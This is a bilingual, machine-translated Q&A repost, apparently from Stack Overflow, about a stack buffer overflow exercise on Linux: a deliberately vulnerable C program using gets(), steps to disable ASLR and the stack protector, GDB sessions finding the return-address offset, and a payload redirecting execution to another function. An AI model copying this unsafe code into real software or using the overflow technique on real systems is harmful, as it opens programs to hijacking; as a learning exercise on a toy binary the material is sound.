[英]ROP faild on linux even when ASLR and stack compiler protector are disabled
I tern off the ASLR and tern of the gcc stack protector.我关闭了 gcc 堆栈保护器的 ASLR 和 tern。
And I wrote C vulnerable code and I tried to overflow the buffer so I check how many character need for the crash.我编写了 C 易受攻击的代码,并试图溢出缓冲区,因此我检查了崩溃需要多少字符。 And I tried to change the return address , to another function but I got a message:
我试图将返回地址更改为另一个函数,但我收到一条消息:
Segmentation fault (core dumped)
This is my C code:这是我的 C 代码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void sss()
{
printf("good by");
}
void scriptpy(){
printf("hello world\n");
}
int main(int argc , char** argv)
{
char buf[4];
gets(buf);
return 0;
}
I found the address of the "sss" function and i tried to insert the hex value .我找到了“sss”函数的地址,并尝试插入十六进制值。
This is my address:这是我的地址:
(gdb) disas sss
Dump of assembler code for function sss:
0x00000000000006ca <+0>: push %rbp
To edit the return address i insert:要编辑我插入的返回地址:
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
Let's suppose that the binary is compiled with the flag -fno-stack-protector
and the ASLR is disabled echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
假设二进制文件是使用标志
-fno-stack-protector
编译的,并且 ASLR 已禁用echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
. echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
。
The program start crashing with payload of 12 characters:程序开始崩溃,有效载荷为 12 个字符:
$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)
Using GDB to find the offset that overwrite RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:使用GDB查找覆盖RIP的偏移量,我们可以发现RIP的第一个字节可以用13个字符的有效载荷0x41('A')覆盖:
$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
Note that RIP is overwritten with 0041 where 00
is the null characters terminating the string.请注意,RIP 被0041覆盖,其中
00
是终止字符串的空字符。
To control all bytes of RIP:要控制 RIP 的所有字节:
(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
Let's suppose that the function sss
is located at the address 0x0000555555555189
.假设函数
sss
位于地址0x0000555555555189
。
The final payload is:最终的有效载荷是:
(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()
Where 11 = 18 - (len('\\x89\\x51\\x55\\x55\\x55\\x55') + 1)其中 11 = 18 - (len('\\x89\\x51\\x55\\x55\\x55\\x55') + 1)
+1 for the null byte +1 为空字节
The jump to the function sss
is taken.跳转到函数
sss
。 The program will crash after the jump to the function sss
as the stack will be corrupted.跳转到函数
sss
后程序将崩溃,因为堆栈将被破坏。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.